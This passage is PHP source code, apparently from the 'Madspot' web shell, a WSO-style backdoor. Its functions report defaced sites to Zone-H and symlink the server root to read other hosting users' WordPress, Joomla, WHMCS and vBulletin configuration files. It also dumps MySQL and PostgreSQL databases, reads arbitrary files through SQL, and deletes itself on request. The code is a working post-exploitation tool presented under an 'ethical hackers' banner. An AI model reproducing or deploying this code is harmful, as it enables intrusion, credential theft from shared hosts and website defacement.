1316    ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
1317    echo "Site : ".$sites[$i]." Defaced !<br>";
1318    ++$i;
1319    }
1320      
1321     "Sending Sites To Zone-H Has Been Completed Successfully !! </pre>";
1322 }
1323 echo "</div>";
1324 madfooter();
1325     
1326 }
1327 function madspot()
1328 {
1329     madhead();
1330     echo "<div class=header>";
1331     echo "<pre>
1332     
1333                            |`-:_
1334   ,----....____            |    `+.                                                           
1335  (             ````----....|___   |
1336   \     _                      ````----....____
1337    \    _)  Coded By: Ikram Ali                ```---.._                       
1338     \                                                   \ 
1339   )`.\  )`.   )`.   )`.   )`.   )`.   )`.   )`.   )`.   )`.   )hh
1340 -'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `-'   `
1341    Madspot is a Team of professional Ethical Hackers From Pakistan.
1342    We have Years of  Experience in  Security, Penetration & Coding 
1343    And can Break and Secure.
1344    
1345    Version 1.0
1346    
1347    Contact : http://www.madspot.net
1348    
1349    if you found bug contact our team 
1350    
1351    
1352 
1353 
1354               .=''=.             
1355              / _  _ \
1356             |  d  b  |
1357             \   /\   / 
1358            ,/'-=\/=-'\,
1359           / /        \ \     -----------------------------
1360          | / Zahid    \ |    Madspot Digital Security Team
1361          \/ \ Rasheed/ \/    -----------------------------
1362              '.    .'
1363              _|`~~`|_
1364              /|\  /|\    
1365   
1366        .- <O> -.        .-====-.      ,-------.      .-=<>=-.
1367    /_-\'''/-_\      / / '' \ \     |,-----.|     /__----__\
1368   |/  o) (o  \|    | | ')(' | |   /,'-----'.\   |/ (')(') \|
1369    \   ._.   /      \ \    / /   {_/(') (')\_}   \   __   /
1370    ,>-_,,,_-<.       >'=jf='<     `.   _   .'    ,'--__--'.
1371  / Waqar.Khan  \    /        \     /'-___-'\    /    <img src="/wp-includes/images/smilies/icon_neutral.gif" alt=":|" class="wp-smiley" />    \
1372 (_)     .     (_)  /  Ikram   \   / M-Usman \  (_)   <img src="/wp-includes/images/smilies/icon_neutral.gif" alt=":|" class="wp-smiley" />   (_)
1373  \_-----'____--/  (_)  Ali   (_) (_)_______(_)   |___:|____|
1374   \___________/     |________|     \_______/     | Afrasiab|
1375 
1376 
1377   
1378   
1379   
1380     </pre></div>";
1381     madfooter();
1382     
1383     }
1384     
1385 function madsymlink()
1386 {
1387     madhead();
1388     
1389 $IIIIIIIIIIIl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1390 $IIIIIIIIIII1=explode('/',$IIIIIIIIIIIl );
1391 $IIIIIIIIIIIl =str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1)-1],'',$IIIIIIIIIIIl );  
1392     
1393     
1394     
1395 
1396    echo '<div class=header><script>p1_=p2_=p3_="";</script><br><center><h3><a href=# onclick="g(\'symlink\',null,\'website\',null)">| Domains | </a><a href=# onclick="g(\'symlink\',null,null,\'whole\')">| Whole Server Symlink | </a><a href=# onclick="g(\'symlink\',null,null,null,\'config\')">| Config PHP symlink | </a></h3></center>';
1397     
1398     if(isset($_POST['p1']) && $_POST['p1']=='website')
1399     {
1400         echo "<center>";
1401         $d0mains = @file("/etc/named.conf");
1402         if(!$d0mains){ echo "<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; }
1403 
1404  
1405 
1406 echo "<table align=center class='main'  border=0  >
1407 
1408 <tr bgcolor=Red><td>Count</td><td>domains</td><td>users</td></tr>";
1409 $count=1;
1410 foreach($d0mains as $d0main){
1411 
1412 if(@eregi("zone",$d0main)){
1413 
1414 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1415 
1416 flush();
1417 
1418 if(strlen(trim($domains[1][0])) > 2){
1419 
1420 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1421 
1422 echo "<tr><td>".$count."</td><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"; flush();
1423 $count++;
1424 }}}
1425 echo "</center></table>"; 
1426  }
1427  
1428  if(isset($_POST['p2']) && $_POST['p2']=='whole')
1429  {
1430     
1431     
1432     @set_time_limit(0);
1433     
1434     echo "<center>";
1435     
1436   
1437         
1438 @mkdir('sym',0777);
1439 $IIIIIIIIIIl1  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1440 $IIIIIIIIII1I =@fopen ('sym/.htaccess','w');
1441 fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1);
1442 @symlink('/','sym/root');
1443 $IIIIIIIIIlIl = basename('_FILE_');
1444     
1445     
1446 $IIIIIIIIIllI = @file('/etc/named.conf');
1447 if(!$IIIIIIIIIllI)
1448 {
1449 echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; 
1450 }
1451 else
1452 {
1453 echo "<table align='center' width='40%' class='main'><td>Domains</td><td>Users</td><td>symlink </td>";
1454 foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
1455 if(@eregi('zone',$IIIIIIIIIll1)){
1456 preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11);
1457 flush();
1458 if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
1459 $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
1460 $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
1461 @symlink('/','sym/root');
1462 $IIIIIIII1I1l = $IIIIIIIIIl11[1][0];
1463 $IIIIIIII1I11 = '\.ir';
1464 $IIIIIIII1lII = '\.il';
1465 if (@eregi("$IIIIIIII1I11",$IIIIIIIIIl11[1][0]) or @eregi("$IIIIIIII1lII",$IIIIIIIIIl11[1][0]) )
1466 {
1467 $IIIIIIII1I1l = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$IIIIIIIIIl11[1][0].'</div>';
1468 }
1469 echo "
1470 <tr>
1471 
1472 <td>
1473 <a target='_blank' href=http://www.".$IIIIIIIIIl11[1][0].'/>'.$IIIIIIII1I1l.' </a>
1474 </td>
1475 
1476 <td>
1477 '.$IIIIIIIII1I1['name']."
1478 </td>
1479 
1480 <td>
1481 <a href='sym/root/home/".$IIIIIIIII1I1['name']."/public_html' target='_blank'>symlink </a>
1482 </td>
1483 
1484 
1485 </tr>";
1486 flush();
1487 }
1488 }
1489 }
1490 }
1491     
1492 echo "</center></table>";    
1493     
1494  }
1495  
1496  
1497  
1498  if(isset($_POST['p3']) && $_POST['p3']=='config')
1499  
1500  
1501  {
1502   echo "<center>";
1503 @mkdir('sym',0777);
1504 $IIIIIIIIIIl1  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1505 $IIIIIIIIII1I =@fopen ('sym/.htaccess','w');
1506 @fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1);
1507 @symlink('/','sym/root');
1508 $IIIIIIIIIlIl = basename('_FILE_');
1509   
1510    
1511    $IIIIIIIIIllI = @file('/etc/named.conf');
1512 if(!$IIIIIIIIIllI)
1513 {
1514 echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
1515 }
1516 else
1517 {
1518 echo "
1519 <table align='center' width='40%' class='main' ><td> Domains </td><td> Script </td>";
1520 foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
1521 if(@eregi('zone',$IIIIIIIIIll1)){
1522 preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11);
1523 flush();
1524 if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
1525 $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
1526 $IIIIIIIII1l1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/wp-config.php';
1527 $IIIIIIIII11I=get_headers($IIIIIIIII1l1);
1528 $IIIIIIIII11l=$IIIIIIIII11I[0];
1529 $IIIIIIIII111=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/blog/wp-config.php';
1530 $IIIIIIIIlIII=get_headers($IIIIIIIII111);
1531 $IIIIIIIIlIIl=$IIIIIIIIlIII[0];
1532 $IIIIIIIIlII1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/configuration.php';
1533 $IIIIIIIIlIlI=get_headers($IIIIIIIIlII1);
1534 $IIIIIIIIlIll=$IIIIIIIIlIlI[0];
1535 $IIIIIIIIlIl1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/joomla/configuration.php';
1536 $IIIIIIIIlI1I=get_headers($IIIIIIIIlIl1);
1537 $IIIIIIIIlI1l=$IIIIIIIIlI1I[0];
1538 $IIIIIIIIlI11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/includes/config.php';
1539 $IIIIIIIIllII=get_headers($IIIIIIIIlI11);
1540 $IIIIIIIIllIl=$IIIIIIIIllII[0];
1541 $IIIIIIIIllI1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/vb/includes/config.php';
1542 $IIIIIIIIlllI=get_headers($IIIIIIIIllI1);
1543 $IIIIIIIIllll=$IIIIIIIIlllI[0];
1544 $IIIIIIIIlll1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/forum/includes/config.php';
1545 $IIIIIIIIll1I=get_headers($IIIIIIIIlll1);
1546 $IIIIIIIIll1l=$IIIIIIIIll1I[0];
1547 $IIIIIIIIll11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'public_html/clients/configuration.php';
1548 $IIIIIIIIl1II=get_headers($IIIIIIIIll11);
1549 $IIIIIIIIl1Il=$IIIIIIIIl1II[0];
1550 $IIIIIIIIl1I1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/support/configuration.php';
1551 $IIIIIIIIl1II=get_headers($IIIIIIIIl1I1);
1552 $IIIIIIIIl1lI=$IIIIIIIIl1II[0];
1553 $IIIIIIIIl1ll=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php';
1554 $IIIIIIIIl1l1=get_headers($IIIIIIIIl1ll);
1555 $IIIIIIIIl11I=$IIIIIIIIl1l1[0];
1556 $IIIIIIIIl11l=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/submitticket.php';
1557 $IIIIIIIIl111=get_headers($IIIIIIIIl11l);
1558 $IIIIIIII1III=$IIIIIIIIl111[0];
1559 $IIIIIIII1IIl=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php';
1560 $IIIIIIII1II1=get_headers($IIIIIIII1IIl);
1561 $IIIIIIII1IlI=$IIIIIIII1II1[0];
1562 $IIIIIIII1Ill = strpos($IIIIIIIII11l,'200');
1563 $IIIIIIII1I1I='&nbsp;';
1564 if (strpos($IIIIIIIII11l,'200') == true )
1565 {
1566 $IIIIIIII1I1I="<a href='".$IIIIIIIII1l1."' target='_blank'>Wordpress</a>";
1567 }
1568 elseif (strpos($IIIIIIIIlIIl,'200') == true)
1569 {
1570 $IIIIIIII1I1I="<a href='".$IIIIIIIII111."' target='_blank'>Wordpress</a>";
1571 }
1572 elseif (strpos($IIIIIIIIlIll,'200')  == true and strpos($IIIIIIII1III,'200')  == true )
1573 {
1574 $IIIIIIII1I1I=" <a href='".$IIIIIIIIl11l."' target='_blank'>WHMCS</a>";
1575 }
1576 elseif (strpos($IIIIIIIIl1lI,'200')  == true)
1577 {
1578 $IIIIIIII1I1I =" <a href='".$IIIIIIIIl1I1."' target='_blank'>WHMCS</a>";
1579 }
1580 elseif (strpos($IIIIIIIIl11I,'200')  == true)
1581 {
1582 $IIIIIIII1I1I =" <a href='".$IIIIIIIIl1ll."' target='_blank'>WHMCS</a>";
1583 }
1584 elseif (strpos($IIIIIIIIlIll,'200')  == true)
1585 {
1586 $IIIIIIII1I1I=" <a href='".$IIIIIIIIlII1."' target='_blank'>Joomla</a>";
1587 }
1588 elseif (strpos($IIIIIIIIlI1l,'200')  == true)
1589 {
1590 $IIIIIIII1I1I=" <a href='".$IIIIIIIIlIl1."' target='_blank'>Joomla</a>";
1591 }
1592 elseif (strpos($IIIIIIIIllIl,'200')  == true)
1593 {
1594 $IIIIIIII1I1I=" <a href='".$IIIIIIIIlI11."' target='_blank'>vBulletin</a>";
1595 }
1596 elseif (strpos($IIIIIIIIllll,'200')  == true)
1597 {
1598 $IIIIIIII1I1I=" <a href='".$IIIIIIIIllI1."' target='_blank'>vBulletin</a>";
1599 }
1600 elseif (strpos($IIIIIIIIll1l,'200')  == true)
1601 {
1602 $IIIIIIII1I1I=" <a href='".$IIIIIIIIlll1."' target='_blank'>vBulletin</a>";
1603 }
1604 else
1605 {
1606 continue;
1607 }
1608 $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
1609 echo '<tr><td><a href=http://www.'.$IIIIIIIIIl11[1][0].'/>'.$IIIIIIIIIl11[1][0].'</a></td>
1610 <td>'.$IIIIIIII1I1I.'</td></tr>';flush();
1611 }
1612 }
1613 }
1614 }
1615 echo "</center></table>";   
1616     
1617  }
1618     
1619     echo "</div>";
1620     madfooter();
1621     
1622 }    
1623 
1624 
1625 function madsql()
1626 {
1627     
1628     
1629     class DbClass {
1630        var $type;
1631        var $link;
1632        var $res;
1633        function DbClass($type)    {
1634            $this->type = $type;
1635        }
1636        function connect($host, $user, $pass, $dbname){
1637            switch($this->type)  {
1638                case 'mysql':
1639                    if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1640                    break;
1641                case 'pgsql':
1642                    $host = explode(':', $host);
1643                    if(!$host[1]) $host[1]=5432;
1644                    if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1645                    break;
1646            }
1647            return false;
1648        }
1649        function selectdb($db) {
1650            switch($this->type)  {
1651                case 'mysql':
1652                    if (@mysql_select_db($db))return true;
1653                    break;
1654            }
1655            return false;
1656        }
1657        function query($str) {
1658            switch($this->type) {
1659                case 'mysql':
1660                    return $this->res = @mysql_query($str);
1661                    break;
1662                case 'pgsql':
1663                    return $this->res = @pg_query($this->link,$str);
1664                    break;
1665            }
1666            return false;
1667        }
1668        function fetch() {
1669            $res = func_num_args()?func_get_arg(0):$this->res;
1670            switch($this->type)  {
1671                case 'mysql':
1672                    return @mysql_fetch_assoc($res);
1673                    break;
1674                case 'pgsql':
1675                    return @pg_fetch_assoc($res);
1676                    break;
1677            }
1678            return false;
1679        }
1680        function listDbs() {
1681            switch($this->type)  {
1682                case 'mysql':
1683                         return $this->query("SHOW databases");
1684                break;
1685                case 'pgsql':
1686                    return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
1687                break;
1688            }
1689            return false;
1690        }
1691        function listTables() {
1692            switch($this->type)  {
1693                case 'mysql':
1694                    return $this->res = $this->query('SHOW TABLES');
1695                break;
1696                case 'pgsql':
1697                    return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
1698                break;
1699            }
1700            return false;
1701        }
1702        function error() {
1703            switch($this->type)  {
1704                case 'mysql':
1705                    return @mysql_error();
1706                break;
1707                case 'pgsql':
1708                    return @pg_last_error();
1709                break;
1710            }
1711            return false;
1712        }
1713        function setCharset($str) {
1714            switch($this->type)  {
1715                case 'mysql':
1716                    if(function_exists('mysql_set_charset'))
1717                        return @mysql_set_charset($str, $this->link);
1718                    else
1719                        $this->query('SET CHARSET '.$str);
1720                    break;
1721                case 'pgsql':
1722                    return @pg_set_client_encoding($this->link, $str);
1723                    break;
1724            }
1725            return false;
1726        }
1727        function loadFile($str) {
1728            switch($this->type)  {
1729                case 'mysql':
1730                    return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
1731                break;
1732                case 'pgsql':
1733                    $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
1734                    $r=array();
1735                    while($i=$this->fetch())
1736                        $r[] = $i['file'];
1737                    $this->query('drop table wso2');
1738                    return array('file'=>implode("\n",$r));
1739                break;
1740            }
1741            return false;
1742        }
1743        function dump($table, $fp = false) {
1744            switch($this->type)  {
1745                case 'mysql':
1746                    $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1747                    $create = mysql_fetch_array($res);
1748                    $sql = $create[1].";\n";
1749                     if($fp) fwrite($fp, $sql); else echo($sql);
1750                    $this->query('SELECT * FROM `'.$table.'`');
1751                     $head = true;
1752                    while($item = $this->fetch()) {
1753                        $columns = array();
1754                        foreach($item as $k=>$v) {
1755                             if($v == null)
1756                                 $item[$k] = "NULL";
1757                             elseif(is_numeric($v))
1758                                 $item[$k] = $v;
1759                             else
1760                                 $item[$k] = "'".@mysql_real_escape_string($v)."'";
1761                            $columns[] = "`".$k."`";
1762                        }
1763                         if($head) {
1764                             $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
1765                             $head = false;
1766                         } else
1767                             $sql = "\n\t,(".implode(", ", $item).')';
1768                         if($fp) fwrite($fp, $sql); else echo($sql);
1769                    }
1770                     if(!$head)
1771                         if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
1772                break;
1773                case 'pgsql':
1774                    $this->query('SELECT * FROM '.$table);
1775                    while($item = $this->fetch()) {
1776                        $columns = array();
1777                        foreach($item as $k=>$v) {
1778                            $item[$k] = "'".addslashes($v)."'";
1779                            $columns[] = $k;
1780                        }
1781                         $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1782                         if($fp) fwrite($fp, $sql); else echo($sql);
1783                    }
1784                break;
1785            }
1786            return false;
1787        }
1788    };
1789    $db = new DbClass($_POST['type']);
1790    if(@$_POST['p2']=='download') {
1791        $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1792        $db->selectdb($_POST['sql_base']);
1793         switch($_POST['charset']) {
1794             case "Windows-1251": $db->setCharset('cp1251'); break;
1795             case "UTF-8": $db->setCharset('utf8'); break;
1796             case "KOI8-R": $db->setCharset('koi8r'); break;
1797             case "KOI8-U": $db->setCharset('koi8u'); break;
1798             case "cp866": $db->setCharset('cp866'); break;
1799         }
1800         if(empty($_POST['file'])) {
1801             ob_start("ob_gzhandler", 4096);
1802             header("Content-Disposition: attachment; filename=dump.sql");
1803             header("Content-Type: text/plain");
1804             foreach($_POST['tbl'] as $v)
1805                $db->dump($v);
1806             exit;
1807         } elseif($fp = @fopen($_POST['file'], 'w')) {
1808             foreach($_POST['tbl'] as $v)
1809                 $db->dump($v, $fp);
1810             fclose($fp);
1811             unset($_POST['p2']);
1812         } else
1813             die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
1814    }
1815    madhead();
1816    echo "
1817 <div class=header>
1818 <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
1819 <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
1820 <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
1821 <td><select name='type'><option value='mysql' ";
1822     if(@$_POST['type']=='mysql')echo 'selected';
1823 echo ">MySql</option><option value='pgsql' ";
1824 if(@$_POST['type']=='pgsql')echo 'selected';
1825 echo ">PostgreSql</option></select></td>
1826 <td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
1827 <td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
1828 <td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
1829    $tmp = "<input type=text name=sql_base value=''>";
1830    if(isset($_POST['sql_host'])){
1831        if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1832            switch($_POST['charset']) {
1833                case "Windows-1251": $db->setCharset('cp1251'); break;
1834                case "UTF-8": $db->setCharset('utf8'); break;
1835                case "KOI8-R": $db->setCharset('koi8r'); break;
1836                case "KOI8-U": $db->setCharset('koi8u'); break;
1837                case "cp866": $db->setCharset('cp866'); break;
1838            }
1839            $db->listDbs();
1840            echo "<select name=sql_base><option value=''></option>";
1841            while($item = $db->fetch()) {
1842                list($key, $value) = each($item);
1843                echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1844            }
1845            echo '</select>';
1846        }
1847        else echo $tmp;
1848    }else
1849        echo $tmp;
1850    echo "</td>
1851               <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
1852                 <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
1853           </tr>
1854       </table>
1855       <script>
1856             s_db='".@addslashes($_POST['sql_base'])."';
1857             function fs(f) {
1858                 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
1859                     if(f.p1) f.p1.value='';
1860                     if(f.p2) f.p2.value='';
1861                     if(f.p3) f.p3.value='';
1862                 }
1863             }
1864           function st(t,l) {
1865               d.sf.p1.value = 'select';
1866               d.sf.p2.value = t;
1867                 if(l && d.sf.p3) d.sf.p3.value = l;
1868               d.sf.submit();
1869           }
1870           function is() {
1871               for(i=0;i<d.sf.elements['tbl[]'].length;++i)
1872                   d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
1873           }
1874       </script>";
1875    if(isset($db) && $db->link){
1876        echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1877            if(!empty($_POST['sql_base'])){
1878                $db->selectdb($_POST['sql_base']);
1879                echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
1880                $tbls_res = $db->listTables();
1881                while($item = $db->fetch($tbls_res)) {
1882                    list($key, $value) = each($item);
1883                     if(!empty($_POST['sql_count']))
1884                         $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1885                    $value = htmlspecialchars($value);
1886                    echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
1887                }
1888                echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
1889                if(@$_POST['p1'] == 'select') {
1890                    $_POST['p1'] = 'query';
1891                     $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
1892                    $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
1893                    $num = $db->fetch();
1894                    $pages = ceil($num['n'] / 30);
1895                     echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
1896                     echo " of $pages";
1897                     if($_POST['p3'] > 1)
1898                         echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>";
1899                     if($_POST['p3'] < $pages)
1900                         echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>";
1901                     $_POST['p3']--;
1902                    if($_POST['type']=='pgsql')
1903                        $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1904                    else
1905                        $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1906                    echo "<br><br>";
1907                }
1908                if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
1909                    $db->query(@$_POST['p2']);
1910                    if($db->res !== false) {
1911                        $title = false;
1912                        echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
1913                        $line = 1;
1914                        while($item = $db->fetch())   {
1915                            if(!$title) {
1916                                echo '<tr>';
1917                                foreach($item as $key => $value)
1918                                    echo '<th>'.$key.'</th>';
1919                                reset($item);
1920                                $title=true;
1921                                echo '</tr><tr>';
1922                                $line = 2;
1923                            }
1924                            echo '<tr class="l'.$line.'">';
1925                            $line = $line==1?2:1;
1926                            foreach($item as $key => $value) {
1927                                if($value == null)
1928                                    echo '<td><i>null</i></td>';
1929                                else
1930                                    echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
1931                            }
1932                            echo '</tr>';
1933                        }
1934                        echo '</table>';
1935                    } else {
1936                        echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
1937                    }
1938                }
1939                echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
1940                 if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
1941                     echo htmlspecialchars($_POST['p2']);
1942                 echo "</textarea><br/><input type=submit value='Execute'>";
1943                echo "</td></tr>";
1944            }
1945            echo "</table></form><br/>";
1946             if($_POST['type']=='mysql') {
1947                 $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
1948                 if($db->fetch())
1949                     echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1950             }
1951            if(@$_POST['p1'] == 'loadfile') {
1952                $file = $db->loadFile($_POST['p2']);
1953                echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1954            }
1955    } else {
1956         echo htmlspecialchars($db->error());
1957     }
1958    echo '</div>';
1959     madfooter();
1960     
1961  }
1962  
1963  function madselfrm()
1964  {
1965     
1966     if($_POST['p1'] == 'yes')
1967        if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
1968            die('Shell has been removed');
1969        else
1970            echo 'unlink error!';
1971     if($_POST['p1'] != 'yes')
1972         madhead();
1973    echo "<div class=header><pre class=ml1 style='margin-top:5px'>";
1974     
1975     
1976     echo "
1977     
1978                 /^\
1979        _.-`:   /   \   :'-._
1980      ,`    :  |     |  :    '.
1981    ,`       \,|     |,/       '.
1982   /           `-...-`           \
1983  :              .'.              :
1984  |             . ' .             |
1985  |             ' . '             |
1986  :              '.'              :
1987   \           ,-'''-,           /
1988    `.       /'|     |'\       ,'
1989      `._   ;  |     |  ;   _,'
1990         `-.:  |     |  :,-'
1991               |     |
1992               |     |
1993               |     |
1994               |     |
1995               |     |
1996 ";
1997     
1998     
1999     
2000     echo '<br>Kill Me?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
2001    madFooter();
2002     
2003  }
2004 
2005 
2006 if( empty($_POST['a']) )
2007    if(isset($default_action) && function_exists('mad' . $default_action))
2008        $_POST['a'] = $default_action;
2009    else
2010        $_POST['a'] = 'FilesMan';
2011 if( !empty($_POST['a']) && function_exists('mad' . $_POST['a']) )
2012    call_user_func('mad' . $_POST['a']);
2013    exit;
2014 ?>